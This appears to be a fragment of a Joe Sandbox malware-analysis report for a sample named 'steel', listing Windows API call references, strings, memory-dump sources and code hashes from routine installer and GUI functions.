                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$LoadSleep
                                                                                            • String ID: CheckPassword
                                                                                            • API String ID: 4023313301-1302249611
                                                                                            • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                            • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                                                            • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                            • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                                                            APIs
                                                                                              • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                              • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                              • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                            • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                                                            • GetTickCount.KERNEL32 ref: 00477CE6
                                                                                            • GetTickCount.KERNEL32 ref: 00477CF0
                                                                                            • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                                                            Strings
                                                                                            • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                            • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                            • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                            • API String ID: 613034392-3771334282
                                                                                            • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                            • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                            • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                            • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                                                            Strings
                                                                                            • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                            • CreateAssemblyCache, xrefs: 00459836
                                                                                            • Fusion.dll, xrefs: 004597DF
                                                                                            • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                            • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                            • API String ID: 190572456-3990135632
                                                                                            • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                            • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                            • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                            • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                            APIs
                                                                                              • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                            • GetFocus.USER32 ref: 0041C168
                                                                                            • GetDC.USER32(?), ref: 0041C174
                                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                            • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                            • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                            • String ID:
                                                                                            • API String ID: 3303097818-0
                                                                                            • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                            • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                            • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                            • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                            • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                            • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                              • Part of subcall function 004107F8: 6F52C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                            • 6F59CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                            • 6F59C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                            • 6F59CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                            • 6F530860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$C400C740F530860F532980
                                                                                            • String ID:
                                                                                            • API String ID: 209721339-0
                                                                                            • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                            • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                            • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                            • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                            • API String ID: 47109696-2530820420
                                                                                            • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                            • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                            • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                            • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                            APIs
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                            • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectSelect$Delete$Stretch
                                                                                            • String ID:
                                                                                            • API String ID: 1458357782-0
                                                                                            • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                            • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                                            • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                            • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 00495519
                                                                                              • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                            • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                            Strings
                                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                            • API String ID: 2948443157-222967699
                                                                                            • Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                            • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                                                            • Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                            • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                                                            APIs
                                                                                            • GetCursorPos.USER32 ref: 004233AF
                                                                                            • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                                            • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                                            • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                                            • SetCursor.USER32(00000000), ref: 00423413
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1770779139-0
                                                                                            • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                            • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                                            • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                            • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                            • API String ID: 667068680-2254406584
                                                                                            • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                            • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                                                            • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                            • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
                                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
                                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                            • API String ID: 190572456-212574377
                                                                                            • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                            • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                                                            • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                            • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                                            • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                              • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                              • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                              • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                            • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                            • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                            • API String ID: 142928637-2676053874
                                                                                            • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                            • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                                                            • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                            • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                                            • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                                            • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                            • API String ID: 2238633743-1050967733
                                                                                            • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                            • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                                            • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                            • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                            • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                            • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                            • API String ID: 667068680-222143506
                                                                                            • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                            • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                            • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                            • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 0041B57E
                                                                                            • GetDC.USER32(?), ref: 0041B58A
                                                                                            • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                            • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                            • String ID:
                                                                                            • API String ID: 2502006586-0
